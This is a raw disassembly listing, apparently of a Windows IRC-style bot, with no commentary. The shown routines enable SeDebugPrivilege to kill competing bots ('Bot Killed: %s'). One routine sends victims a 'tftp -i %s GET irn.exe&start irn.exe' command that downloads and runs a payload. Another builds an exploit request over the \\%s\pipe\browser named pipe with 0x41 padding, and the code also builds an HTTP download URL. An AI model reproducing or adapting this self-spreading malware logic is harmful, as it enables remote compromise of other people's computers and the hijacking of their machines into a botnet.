		call	esi ; sub_45000F
		push	offset aModule32next ; "Module32Next"
		push	offset aKernel32_dll_6 ; "kernel32.dll"
		mov	dword_429088, eax
		call	edi	; GetModuleHandleA
		push	eax
		call	esi ; sub_45000F
		push	offset aThread32first ;	"Thread32First"
		push	offset aKernel32_dll_7 ; "kernel32.dll"
		mov	dword_4290A4, eax
		call	edi	; GetModuleHandleA
		push	eax
		call	esi ; sub_45000F
		push	offset aThread32next ; "Thread32Next"
		push	offset aKernel32_dll_8 ; "kernel32.dll"
		mov	dword_42908C, eax
		call	edi	; GetModuleHandleA
		push	eax
		call	esi ; sub_45000F
		push	offset aReadprocessmem ; "ReadProcessMemory"
		push	offset aKernel32_dll_9 ; "kernel32.dll"
		mov	dword_4290B0, eax
		call	edi	; GetModuleHandleA
		push	eax
		call	esi ; sub_45000F
		push	offset aGetmodulefilen ; "GetModuleFileNameExA"
		push	offset aPsapi_dll ; "psapi.dll"
		mov	dword_429090, eax
		call	ds:off_41E0E4
		push	eax
		call	esi ; sub_45000F
		cmp	dword_4290A0, ebx
		mov	dword_4290A8, eax
		jz	loc_41AF9B
		cmp	dword_4290AC, ebx
		jz	loc_41AF9B
		cmp	dword_429094, ebx
		jz	loc_41AF9B
		cmp	dword_429098, ebx
		jz	loc_41AF9B
		cmp	dword_42909C, ebx
		jz	loc_41AF9B
		cmp	dword_429088, ebx
		jz	loc_41AF9B
		cmp	dword_4290A4, ebx
		jz	loc_41AF9B
		cmp	dword_42908C, ebx
		jz	loc_41AF9B
		cmp	dword_4290B0, ebx
		jz	loc_41AF9B
		cmp	dword_429090, ebx
		jz	loc_41AF9B
		cmp	eax, ebx
		jz	loc_41AF9B
		mov	edi, 104h
		push	edi
		lea	eax, [esp+57Ch+var_318]
		push	eax
		call	ds:dword_41E0F0	; GetSystemDirectoryA
		lea	eax, [esp+578h+var_558]
		xor	esi, esi
		mov	[esp+578h+var_568], eax

loc_41ACB7:				; CODE XREF: sub_41AAD0+238j
		mov	ecx, [esp+578h+var_568]
		push	dword ptr [ecx]
		lea	ecx, [esp+57Ch+var_318]
		push	ecx
		push	offset aSS_2	; "%s\\%s"
		lea	eax, [esp+esi+584h+var_210]
		push	103h
		push	eax
		call	sub_40307C
		lea	eax, [esp+esi+58Ch+var_210]
		add	esp, 14h
		lea	ecx, [eax+1]

loc_41ACE9:				; CODE XREF: sub_41AAD0+21Ej
		mov	dl, [eax]
		inc	eax
		cmp	dl, bl
		jnz	short loc_41ACE9
		add	[esp+578h+var_568], 4
		sub	eax, ecx
		add	eax, esi
		add	esi, edi
		cmp	esi, 30Ch
		mov	[esp+eax+578h+var_210],	bl
		jb	short loc_41ACB7

loc_41AD0A:				; CODE XREF: sub_41AAD0+4C6j
		push	ebx
		push	0Fh
		mov	[esp+580h+var_548], 128h
		call	dword_429094
		lea	ecx, [esp+578h+var_548]
		push	ecx
		push	eax
		mov	[esp+580h+var_55C], eax
		call	dword_429098
		test	eax, eax
		jz	loc_41AF8B
		jmp	loc_41AF74
; ---------------------------------------------------------------------------

loc_41AD38:				; CODE XREF: sub_41AAD0+4B5j
		mov	edi, ds:off_41E100
		lea	eax, [esp+578h+var_564]
		push	eax
		push	ebx
		push	28h
		mov	[esp+584h+var_569], 1
		call	edi ; sub_451CC3
		mov	esi, ds:off_41E038
		push	eax
		call	esi ; sub_4427AA
		test	eax, eax
		jnz	short loc_41AD8C
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		cmp	eax, 3F0h
		jnz	short loc_41AD88
		push	2
		call	ds:off_41E030
		test	eax, eax
		jnz	short loc_41AD77
		mov	[esp+578h+var_569], bl

loc_41AD77:				; CODE XREF: sub_41AAD0+2A1j
		lea	eax, [esp+578h+var_564]
		push	eax
		push	ebx
		push	28h
		call	edi ; sub_451CC3
		push	eax
		call	esi ; sub_4427AA
		test	eax, eax
		jnz	short loc_41AD8C

loc_41AD88:				; CODE XREF: sub_41AAD0+295j
		mov	[esp+578h+var_569], bl

loc_41AD8C:				; CODE XREF: sub_41AAD0+288j
					; sub_41AAD0+2B6j
		push	1
		push	offset aSedebugprivile ; "SeDebugPrivilege"
		push	[esp+580h+var_564]
		call	sub_41A465
		add	esp, 0Ch
		test	al, al
		jnz	short loc_41ADB1
		push	[esp+578h+var_564]
		call	ds:off_41E0D8
		mov	[esp+578h+var_569], bl

loc_41ADB1:				; CODE XREF: sub_41AAD0+2D1j
		push	[esp+578h+var_540]
		push	ebx
		push	1F0FFFh
		call	dword_4290AC
		cmp	eax, ebx
		mov	[esp+578h+var_568], eax
		jnz	short loc_41ADCD
		mov	[esp+578h+var_569], bl

loc_41ADCD:				; CODE XREF: sub_41AAD0+2F7j
		mov	esi, 104h
		push	esi
		lea	eax, [esp+57Ch+var_420]
		push	ebx
		push	eax
		call	sub_408130
		add	esp, 0Ch
		push	esi
		lea	eax, [esp+57Ch+var_420]
		push	eax
		push	ebx
		push	[esp+584h+var_568]
		call	dword_4290A8
		mov	[esp+578h+var_560], ebx
		lea	edi, [esp+578h+var_210]

loc_41AE03:				; CODE XREF: sub_41AAD0+352j
		lea	eax, [esp+578h+var_420]
		push	eax
		push	edi
		call	sub_402E37
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_41AE26
		inc	[esp+578h+var_560]
		add	edi, esi
		cmp	[esp+578h+var_560], 3
		jb	short loc_41AE03
		jmp	short loc_41AE2A
; ---------------------------------------------------------------------------

loc_41AE26:				; CODE XREF: sub_41AAD0+345j
		mov	[esp+578h+var_569], bl

loc_41AE2A:				; CODE XREF: sub_41AAD0+354j
		cmp	[esp+578h+var_569], bl
		jz	loc_41AF5A
		push	ebx
		push	offset aSedebugprivi_0 ; "SeDebugPrivilege"
		push	[esp+580h+var_564]
		call	sub_41A465
		xor	eax, eax
		lea	edi, [esp+584h+var_558]
		stosd
		stosd
		mov	eax, [esp+584h+var_54C]
		add	esp, 0Ch
		cmp	[esp+578h+var_540], eax
		jz	loc_41AF5A
		lea	eax, [esp+578h+var_524]
		push	offset aSystem	; "System"
		push	eax
		call	sub_402E37
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	loc_41AF5A
		mov	esi, [esp+578h+var_540]
		push	ebx
		push	4
		call	dword_429094
		cmp	eax, 0FFFFFFFFh
		jz	loc_41AF5A
		push	eax
		push	esi
		call	sub_41A5DC
		cmp	al, bl
		pop	ecx
		pop	ecx
		jz	loc_41AF5A
		push	[esp+578h+var_540]
		lea	esi, [esp+57Ch+var_558]
		call	sub_41A640
		test	al, al
		pop	ecx
		jz	loc_41AF3F
		push	[esp+578h+var_554]
		call	sub_402BD6
		cmp	eax, ebx
		pop	ecx
		jnz	short loc_41AEC3
		push	ebx
		jmp	short loc_41AF39
; ---------------------------------------------------------------------------

loc_41AEC3:				; CODE XREF: sub_41AAD0+3EEj
		push	eax
		push	[esp+57Ch+var_554]
		push	[esp+580h+var_558]
		push	[esp+584h+var_568]
		call	sub_41A502
		add	esp, 10h
		cmp	al, bl
		jz	short loc_41AF3F
		push	100h
		call	sub_402BD6
		pop	ecx
		mov	esi, eax
		lea	eax, [esp+578h+var_524]
		push	eax
		lea	eax, [esp+57Ch+var_420]
		push	eax
		push	[esp+580h+var_568]
		call	sub_41AA85
		add	esp, 0Ch
		test	al, al
		jz	short loc_41AF38
		push	esi
		call	sub_402FD3
		pop	ecx
		push	eax
		mov	ebx, offset aTtac ; "â‗"
		call	sub_41A301
		pop	ecx
		lea	eax, [esp+578h+var_420]
		push	eax
		push	offset aBotKilledS ; "Bot Killed: %s"
		push	esi
		push	0
		push	offset dword_4294DC
		call	sub_417FE1
		add	esp, 14h
		xor	ebx, ebx

loc_41AF38:				; CODE XREF: sub_41AAD0+434j
		push	esi

loc_41AF39:				; CODE XREF: sub_41AAD0+3F1j
		call	sub_403129
		pop	ecx

loc_41AF3F:				; CODE XREF: sub_41AAD0+3DCj
					; sub_41AAD0+40Aj
		mov	esi, [esp+578h+var_540]
		push	ebx
		push	4
		call	dword_429094
		cmp	eax, 0FFFFFFFFh
		jz	short loc_41AF5A
		push	eax
		push	esi
		call	sub_41A578
		pop	ecx
		pop	ecx

loc_41AF5A:				; CODE XREF: sub_41AAD0+35Ej
					; sub_41AAD0+386j ...
		push	[esp+578h+var_564]
		mov	esi, ds:off_41E0D8
		call	esi ; sub_443E8D
		push	[esp+578h+var_568]
		call	esi ; sub_443E8D
		push	1
		call	ds:off_41E0F8

loc_41AF74:				; CODE XREF: sub_41AAD0+263j
		lea	eax, [esp+578h+var_548]
		push	eax
		push	[esp+57Ch+var_55C]
		call	dword_42909C
		test	eax, eax
		jnz	loc_41AD38

loc_41AF8B:				; CODE XREF: sub_41AAD0+25Dj
		push	927C0h
		call	ds:off_41E0F8
		jmp	loc_41AD0A
; ---------------------------------------------------------------------------

loc_41AF9B:				; CODE XREF: sub_41AAD0+14Fj
					; sub_41AAD0+15Bj ...
		call	ds:dword_41E0DC	; GetCurrentThreadId
		push	eax
		call	sub_414CA5
		pop	ecx
		mov	ecx, [esp+578h+var_4]
		pop	edi
		pop	esi
		pop	ebx
		xor	ecx, esp
		xor	eax, eax
		call	sub_402C9E
		mov	esp, ebp
		pop	ebp
		retn	4
sub_41AAD0	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41AFC1	proc near		; CODE XREF: sub_41B103+98p

var_5B4		= word ptr -5B4h
var_5B2		= word ptr -5B2h
var_5B0		= dword	ptr -5B0h
var_5A4		= byte ptr -5A4h
var_5A3		= byte ptr -5A3h
var_1A4		= byte ptr -1A4h
var_1A3		= byte ptr -1A3h
var_14		= byte ptr -14h
var_13		= byte ptr -13h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 5B4h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		push	edi
		xor	ebx, ebx
		push	3FFh
		lea	eax, [ebp+var_5A3]
		push	ebx
		push	eax
		mov	[ebp+var_5A4], bl
		call	sub_408130
		push	18Fh
		lea	eax, [ebp+var_1A3]
		push	ebx
		push	eax
		mov	[ebp+var_1A4], bl
		call	sub_408130
		xor	eax, eax
		mov	[ebp+var_14], bl
		lea	edi, [ebp+var_13]
		stosd
		stosd
		stosd
		stosw
		stosb
		xor	eax, eax
		lea	edi, [ebp+var_5B4]
		stosd
		stosd
		stosd
		stosd
		mov	eax, [ebp+arg_0]
		add	esp, 18h
		push	216Bh
		mov	[ebp+var_5B4], 2
		mov	[ebp+var_5B0], eax
		call	ds:dword_41E270	; htons
		push	ebx
		push	1
		push	2
		mov	[ebp+var_5B2], ax
		call	ds:dword_41E220	; socket
		mov	edi, eax
		cmp	edi, 0FFFFFFFFh
		jnz	short loc_41B072
		push	eax

loc_41B05C:				; CODE XREF: sub_41AFC1+C7j
		call	ds:dword_41E280	; closesocket
		xor	al, al

loc_41B064:				; CODE XREF: sub_41AFC1+139j
		mov	ecx, [ebp+var_4]
		pop	edi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
; ---------------------------------------------------------------------------

loc_41B072:				; CODE XREF: sub_41AFC1+98j
		push	10h
		lea	eax, [ebp+var_5B4]
		push	eax
		push	edi
		call	ds:dword_41E23C	; connect
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_41B08A
		push	edi
		jmp	short loc_41B05C
; ---------------------------------------------------------------------------

loc_41B08A:				; CODE XREF: sub_41AFC1+C4j
		push	esi
		push	ebx
		push	400h
		lea	eax, [ebp+var_5A4]
		push	eax
		push	edi
		call	ds:dword_41E26C	; recv
		push	dword_4294DC
		lea	esi, [ebp+var_14]
		call	sub_419C46
		mov	eax, esi
		push	eax
		push	offset aTftpISGetIrn_e ; "tftp -i %s GET irn.exe&start irn.exe&ex"...
		lea	eax, [ebp+var_1A4]
		push	18Fh
		push	eax
		call	sub_40307C
		lea	eax, [ebp+var_1A4]
		add	esp, 14h
		lea	esi, [eax+1]

loc_41B0D2:				; CODE XREF: sub_41AFC1+116j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_41B0D2
		push	ebx
		sub	eax, esi
		push	eax
		lea	eax, [ebp+var_1A4]
		push	eax
		push	edi
		call	ds:dword_41E228	; send
		cmp	eax, 0FFFFFFFFh
		pop	esi
		jnz	short loc_41B0FF

loc_41B0F1:				; CODE XREF: sub_41AFC1+140j
		push	edi
		call	ds:dword_41E280	; closesocket
		mov	al, bl
		jmp	loc_41B064
; ---------------------------------------------------------------------------

loc_41B0FF:				; CODE XREF: sub_41AFC1+12Ej
		mov	bl, 1
		jmp	short loc_41B0F1
sub_41AFC1	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41B103	proc near		; DATA XREF: .data:004255A8o

var_124		= byte ptr -124h
var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_14		= word ptr -14h
var_12		= word ptr -12h
var_10		= dword	ptr -10h
var_4		= dword	ptr -4
arg_0		= byte ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 124h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	esi
		push	edi
		push	44h
		pop	ecx
		lea	esi, [ebp+arg_0]
		lea	edi, [ebp+var_124]
		rep movsd
		mov	edi, [ebp+var_20]
		push	[ebp+var_1C]
		mov	[ebp+var_14], 2
		mov	[ebp+var_10], edi
		call	ds:dword_41E270	; htons
		push	6
		push	1
		push	2
		mov	[ebp+var_12], ax
		call	ds:dword_41E220	; socket
		mov	esi, eax
		cmp	esi, 0FFFFFFFFh
		jz	short loc_41B16B
		push	10h
		lea	eax, [ebp+var_14]
		push	eax
		push	esi
		call	ds:dword_41E23C	; connect
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_41B17B
		push	esi

loc_41B165:				; CODE XREF: sub_41B103+8Fj
		call	ds:dword_41E280	; closesocket

loc_41B16B:				; CODE XREF: sub_41B103+4Dj
					; sub_41B103+A0j
		xor	al, al

loc_41B16D:				; CODE XREF: sub_41B103+B2j
		mov	ecx, [ebp+var_4]
		pop	edi
		xor	ecx, ebp
		pop	esi
		call	sub_402C9E
		leave
		retn
; ---------------------------------------------------------------------------

loc_41B17B:				; CODE XREF: sub_41B103+5Fj
		push	0
		push	1213h
		push	offset dword_4255E0
		push	esi
		call	ds:dword_41E228	; send
		cmp	eax, 0FFFFFFFFh
		push	esi
		jz	short loc_41B165
		call	ds:dword_41E280	; closesocket
		push	edi
		call	sub_41AFC1
		test	al, al
		pop	ecx
		jz	short loc_41B16B
		mov	eax, [ebp+var_24]
		imul	eax, 2Ch
		lea	eax, dword_42554C[eax]
		inc	dword ptr [eax]
		mov	al, 1
		jmp	short loc_41B16D
sub_41B103	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=2C4h


sub_41B1B7	proc near		; CODE XREF: sub_402129+E0p

var_344		= dword	ptr -344h
var_340		= dword	ptr -340h
var_33C		= dword	ptr -33Ch
var_335		= byte ptr -335h
var_334		= byte ptr -334h
var_234		= byte ptr -234h
var_134		= byte ptr -134h
var_133		= byte ptr -133h
var_34		= byte ptr -34h
var_4		= dword	ptr -4

		push	ebp
		lea	ebp, [esp-2C4h]
		sub	esp, 344h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+2C4h+var_4], eax
		push	ebx
		push	esi
		push	edi
		push	0Bh
		pop	ecx
		mov	esi, offset aHardwareDescri ; "HARDWARE\\DESCRIPTION\\System\\CentralProc"...
		lea	edi, [ebp+2C4h+var_34]
		rep movsd
		movsw
		mov	ebx, 100h
		movsb
		push	ebx
		xor	esi, esi
		lea	eax, [ebp+2C4h+var_334]
		push	esi
		push	eax
		call	sub_408130
		push	4
		push	offset dword_429710
		push	offset aMhz	; "~MHz"
		lea	eax, [ebp+2C4h+var_34]
		push	eax
		push	4
		call	sub_417B4D
		add	esp, 20h
		test	al, al
		jz	loc_41B3CF
		push	ebx
		lea	eax, [ebp+2C4h+var_334]
		push	eax
		push	offset aProcessornames ; "ProcessorNameString"
		lea	eax, [ebp+2C4h+var_34]
		push	eax
		push	1
		call	sub_417B4D
		add	esp, 14h
		test	al, al
		jz	loc_41B30F
		mov	edi, 0FFh
		push	edi
		lea	eax, [ebp+2C4h+var_133]
		push	esi
		push	eax
		mov	[ebp+2C4h+var_335], 0
		mov	[ebp+2C4h+var_134], 0
		call	sub_408130
		lea	eax, [ebp+2C4h+var_334]
		push	eax
		push	offset aS_8	; "%s"
		lea	eax, [ebp+2C4h+var_134]
		push	edi
		push	eax
		call	sub_40307C
		lea	eax, [ebp+2C4h+var_134]
		add	esp, 1Ch
		lea	esi, [eax+1]

loc_41B282:				; CODE XREF: sub_41B1B7+D0j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_41B282
		sub	eax, esi
		push	ebx
		push	0
		mov	esi, offset byte_429610
		push	esi
		mov	[ebp+eax+2C4h+var_134],	cl
		call	sub_408130
		add	esp, 0Ch
		xor	ecx, ecx
		mov	[ebp+2C4h+var_33C], ecx

loc_41B2A8:				; CODE XREF: sub_41B1B7+154j
		cmp	[ebp+2C4h+var_335], 0
		jnz	short loc_41B2BF
		cmp	[ebp+ecx+2C4h+var_134],	20h
		jz	short loc_41B2EF
		mov	[ebp+2C4h+var_335], 1
		dec	ecx
		jmp	short loc_41B2EF
; ---------------------------------------------------------------------------

loc_41B2BF:				; CODE XREF: sub_41B1B7+F5j
		movsx	eax, [ebp+ecx+2C4h+var_134]
		push	eax
		push	esi
		push	offset aSC_0	; "%s%c"
		push	edi
		push	esi
		call	sub_40307C
		mov	eax, esi
		add	esp, 14h
		lea	ecx, [eax+1]

loc_41B2DD:				; CODE XREF: sub_41B1B7+12Bj
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_41B2DD
		sub	eax, ecx
		mov	ecx, [ebp+2C4h+var_33C]
		mov	byte_429610[eax], dl

loc_41B2EF:				; CODE XREF: sub_41B1B7+FFj
					; sub_41B1B7+106j
		lea	eax, [ebp+2C4h+var_134]
		inc	ecx
		lea	edx, [eax+1]
		mov	[ebp+2C4h+var_33C], ecx
		mov	[ebp+2C4h+var_344], edx

loc_41B2FF:				; CODE XREF: sub_41B1B7+14Dj
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_41B2FF
		sub	eax, [ebp+2C4h+var_344]
		cmp	ecx, eax
		jbe	short loc_41B2A8
		jmp	short loc_41B342
; ---------------------------------------------------------------------------

loc_41B30F:				; CODE XREF: sub_41B1B7+85j
		push	ebx
		push	esi
		mov	esi, offset byte_429610
		push	esi
		call	sub_408130
		push	offset aUnknown	; "Unknown"
		mov	edi, 0FFh
		push	edi
		push	esi
		call	sub_40307C
		add	esp, 18h
		lea	eax, [esi+1]

loc_41B333:				; CODE XREF: sub_41B1B7+181j
		mov	cl, [esi]
		inc	esi
		test	cl, cl
		jnz	short loc_41B333
		sub	esi, eax
		mov	byte_429610[esi], cl

loc_41B342:				; CODE XREF: sub_41B1B7+156j
		and	dword_429714, 0
		mov	[ebp+2C4h+var_33C], 1

loc_41B350:				; CODE XREF: sub_41B1B7+20Dj
		inc	dword_429714
		push	ebx
		lea	eax, [ebp+2C4h+var_234]
		push	0
		push	eax
		call	sub_408130
		push	[ebp+2C4h+var_33C]
		lea	eax, [ebp+2C4h+var_234]
		push	offset aHardwareDesc_0 ; "HARDWARE\\DESCRIPTION\\System\\CentralProc"...
		push	edi
		push	eax
		call	sub_40307C
		lea	eax, [ebp+2C4h+var_234]
		add	esp, 1Ch
		lea	esi, [eax+1]

loc_41B386:				; CODE XREF: sub_41B1B7+1D4j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_41B386
		sub	eax, esi
		mov	[ebp+eax+2C4h+var_234],	cl
		lea	eax, [ebp+2C4h+var_340]
		push	eax
		push	1
		push	0
		lea	eax, [ebp+2C4h+var_234]
		push	eax
		push	80000002h
		call	ds:off_41E02C
		test	eax, eax
		jnz	short loc_41B3C6
		push	[ebp+2C4h+var_340]
		call	ds:off_41E010
		inc	[ebp+2C4h+var_33C]
		cmp	[ebp+2C4h+var_33C], 8
		jb	short loc_41B350

loc_41B3C6:				; CODE XREF: sub_41B1B7+1FBj
		push	[ebp+2C4h+var_340]
		call	ds:off_41E010

loc_41B3CF:				; CODE XREF: sub_41B1B7+62j
		mov	ecx, [ebp+2C4h+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		add	ebp, 2C4h
		leave
		retn
sub_41B1B7	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41B3E7	proc near		; CODE XREF: sub_413FED+1FEp
					; sub_413FED+301p ...

var_C		= dword	ptr -0Ch
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_1C		= dword	ptr  24h
arg_20		= dword	ptr  28h
arg_28		= dword	ptr  30h
arg_2C		= dword	ptr  34h
arg_30		= dword	ptr  38h
arg_34		= dword	ptr  3Ch
arg_3C		= dword	ptr  44h
arg_40		= byte ptr  48h
arg_4C		= dword	ptr  54h
arg_50		= byte ptr  58h
arg_54		= byte ptr  5Ch
arg_68		= dword	ptr  70h
arg_78		= dword	ptr  80h
arg_7C		= word ptr  84h
arg_80		= dword	ptr  88h
arg_84		= word ptr  8Ch
arg_88		= dword	ptr  90h
arg_8C		= dword	ptr  94h
arg_90		= word ptr  98h
arg_94		= byte ptr  9Ch
arg_98		= dword	ptr  0A0h
arg_9C		= dword	ptr  0A4h
arg_A0		= dword	ptr  0A8h
arg_A4		= dword	ptr  0ACh
arg_A8		= byte ptr  0B0h
arg_AC		= word ptr  0B4h
arg_AE		= word ptr  0B6h
arg_B0		= dword	ptr  0B8h
arg_B4		= word ptr  0BCh
arg_B6		= word ptr  0BEh
arg_B8		= dword	ptr  0C0h
arg_BC		= dword	ptr  0C4h
arg_C0		= word ptr  0C8h
arg_C2		= byte ptr  0CAh
arg_C4		= byte ptr  0CCh
arg_D4		= dword	ptr  0DCh
arg_D8		= byte ptr  0E0h
arg_E8		= dword	ptr  0F0h
arg_EC		= byte ptr  0F4h
arg_1EC		= dword	ptr  1F4h
arg_1F0		= dword	ptr  1F8h
arg_1F8		= dword	ptr  200h
arg_200		= byte ptr  208h
arg_201		= byte ptr  209h
arg_210		= byte ptr  218h
arg_211		= byte ptr  219h
arg_310		= byte ptr  318h
arg_311		= byte ptr  319h
arg_40C		= byte ptr  414h
arg_240C	= byte ptr  2414h
arg_4410	= byte ptr  4418h
arg_6410	= dword	ptr  6418h

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		mov	eax, 641Ch
		call	sub_4119C0
		mov	eax, dword_424064
		xor	eax, esp
		mov	[esp+arg_6410],	eax
		push	ebx
		push	esi
		push	edi
		push	44h
		pop	ecx
		lea	esi, [ebp+arg_0]
		lea	edi, [esp+0Ch+arg_EC]
		rep movsd
		mov	eax, [esp+0Ch+arg_1F0]
		push	eax
		mov	[esp+10h+arg_20], eax
		call	ds:dword_41E25C	; inet_ntoa
		xor	ebx, ebx
		mov	[esp+0Ch+arg_14], eax
		mov	[esp+0Ch+arg_8], ebx

loc_41B433:				; CODE XREF: sub_41B3E7+697j
		cmp	[esp+0Ch+arg_8], 2
		ja	loc_41BA8D
		push	offset dword_41FFF8
		push	[esp+10h+arg_14]
		call	sub_402E37
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_41B4A6
		push	[esp+0Ch+arg_14]
		lea	eax, [esp+10h+arg_40C]
		push	offset dword_41FFFC
		push	2000h
		push	eax
		call	sub_40307C
		add	esp, 10h
		push	8
		pop	ecx
		xor	eax, eax
		push	ebx
		lea	edi, [esp+10h+arg_54]
		rep stosd
		lea	eax, [esp+10h+arg_40C]
		push	offset byte_41FF0E
		mov	[esp+14h+arg_68], eax
		push	offset byte_41FF0F
		lea	eax, [esp+18h+arg_54]
		push	eax
		call	sub_402BD0
		test	eax, eax
		jnz	loc_41BA8D

loc_41B4A6:				; CODE XREF: sub_41B3E7+69j
		push	[esp+0Ch+arg_14]
		lea	eax, [esp+10h+arg_240C]
		push	offset aSPipeBrowser ; "\\\\%s\\pipe\\browser"
		push	2000h
		push	eax
		call	sub_40307C
		add	esp, 10h
		push	ebx
		push	40000000h
		push	3
		push	ebx
		push	3
		push	0C0000000h
		lea	eax, [esp+24h+arg_240C]
		push	eax
		call	ds:off_41E06C
		cmp	eax, 0FFFFFFFFh
		mov	[esp+0Ch+arg_0], eax
		jz	loc_41BA8D
		push	48h
		lea	eax, [esp+10h+arg_A4]
		push	ebx
		push	eax
		call	sub_408130
		mov	byte ptr [esp+18h+arg_A4], 5
		mov	byte ptr [esp+18h+arg_A4+1], bl
		mov	byte ptr [esp+18h+arg_A4+2], 0Bh
		mov	byte ptr [esp+18h+arg_A4+3], 3
		mov	dword ptr [esp+18h+arg_A8], 10h
		mov	[esp+18h+arg_AC], 48h
		mov	[esp+18h+arg_AE], bx
		mov	[esp+18h+arg_B0], ebx
		mov	[esp+18h+arg_B4], 10B8h
		mov	[esp+18h+arg_B6], 10B8h
		mov	[esp+18h+arg_B8], ebx
		mov	[esp+18h+arg_BC], 1
		mov	[esp+18h+arg_C0], bx
		mov	[esp+18h+arg_C2], 1
		mov	esi, offset dword_42001C
		lea	edi, [esp+18h+arg_C4]
		movsd
		movsd
		movsd
		movsd
		mov	[esp+18h+arg_D4], 3
		mov	esi, offset dword_420030
		lea	edi, [esp+18h+arg_D8]
		movsd
		movsd
		add	esp, 0Ch
		movsd
		push	2
		movsd
		pop	esi
		push	ebx
		lea	eax, [esp+10h+arg_50]
		push	eax
		push	48h
		lea	eax, [esp+18h+arg_A4]
		push	eax
		push	[esp+1Ch+arg_0]
		mov	[esp+20h+arg_E8], esi
		call	ds:off_41E088
		test	eax, eax
		jz	loc_41BA83
		push	ebx
		lea	eax, [esp+0Ch+arg_20]
		push	eax
		push	2000h
		lea	eax, [esp+14h+arg_4410]
		push	eax
		push	[esp+18h+arg_4]
		call	ds:off_41E078
		call	ds:dword_41E104	; GetTickCount
		push	eax
		call	sub_4038E4
		mov	edx, 41414141h
		mov	eax, edx
		lea	edi, [esp+0Ch+arg_94]
		stosd
		stosd
		stosd
		stosd
		pop	ecx
		stosd
		push	7
		pop	ecx
		mov	eax, edx
		lea	edi, [esp+8+arg_78]
		rep stosd
		call	sub_4038F1
		mov	dword ptr [esp+8+arg_94], eax
		xor	eax, eax
		inc	eax
		cmp	[esp+8+arg_C], eax
		mov	[esp+8+arg_A0],	eax
		mov	[esp+8+arg_9C],	ebx
		mov	[esp+8+arg_98],	eax
		mov	word ptr [esp+8+arg_A4], bx
		jnz	short loc_41B666
		mov	dword ptr [esp+8+arg_84], eax
		mov	dword ptr [esp+8+arg_7C], eax
		mov	[esp+8+arg_88],	ebx
		jmp	short loc_41B685
; ---------------------------------------------------------------------------

loc_41B666:				; CODE XREF: sub_41B3E7+266j
		cmp	[esp+8+arg_C], ebx
		jnz	short loc_41B68C
		mov	dword ptr [esp+8+arg_84], esi
		mov	dword ptr [esp+8+arg_7C], esi
		mov	[esp+8+arg_88],	2EBh

loc_41B685:				; CODE XREF: sub_41B3E7+27Dj
		mov	[esp+8+arg_80],	ebx

loc_41B68C:				; CODE XREF: sub_41B3E7+283j
		call	sub_4038F1
		cdq
		mov	esi, 0FAh
		mov	ecx, esi
		idiv	ecx
		inc	edx
		mov	[esp+8+arg_78],	edx
		call	sub_4038F1
		cdq
		idiv	esi
		mov	eax, [esp+8+arg_C]
		shl	eax, 4
		mov	edi, dword_426808[eax]
		push	edi
		mov	dword ptr [esp+0Ch+arg_90], ebx
		mov	[esp+0Ch+arg_1C], eax
		mov	[esp+0Ch+arg_10], edi
		inc	edx
		mov	[esp+0Ch+arg_8C], edx
		call	sub_403C6E
		mov	esi, eax
		cmp	esi, ebx
		pop	ecx
		mov	[esp+8+arg_8], esi
		jz	loc_41BA83
		lea	eax, [edi-2]
		push	eax
		push	90h
		push	esi
		call	sub_408130
		lea	edi, [esi+edi-2]
		xor	eax, eax
		stosw
		mov	eax, [esp+14h+arg_1C]
		mov	eax, dword_426810[eax]
		lea	edi, [eax+esi]
		mov	esi, offset dword_4267FC
		movsd
		movsw
		add	eax, 7
		movsb
		mov	[esp+14h+arg_14], eax
		xor	eax, eax
		mov	[esp+14h+arg_200], bl
		lea	edi, [esp+14h+arg_201]
		stosd
		stosd
		stosd
		stosw
		stosb
		add	esp, 0Ch
		mov	edi, 0FFh
		push	edi
		lea	eax, [esp+0Ch+arg_311]
		push	ebx
		push	eax
		mov	[esp+14h+arg_310], bl
		call	sub_408130
		add	esp, 0Ch
		push	edi
		lea	eax, [esp+0Ch+arg_211]
		push	ebx
		push	eax
		mov	[esp+14h+arg_210], bl
		call	sub_408130
		add	esp, 0Ch
		call	sub_419FC7
		test	al, al
		jnz	short loc_41B7DF
		push	dword_4294DC
		lea	esi, [esp+0Ch+arg_200]
		call	sub_419C46
		lea	esi, [esp+0Ch+arg_310]
		mov	ebx, offset aVqdD ; "²»²·¢ï¤¹¤"
		mov	[esp+0Ch+var_C], 100h
		call	sub_41A301
		pop	ecx
		mov	eax, esi
		push	eax
		push	dword_4290B4
		lea	eax, [esp+10h+arg_200]
		push	eax
		push	offset aHttpSDS_0 ; "http://%s:%d/%s"
		lea	eax, [esp+18h+arg_210]
		push	edi
		push	eax
		call	sub_40307C
		lea	eax, [esp+20h+arg_210]
		add	esp, 18h
		lea	ecx, [eax+1]

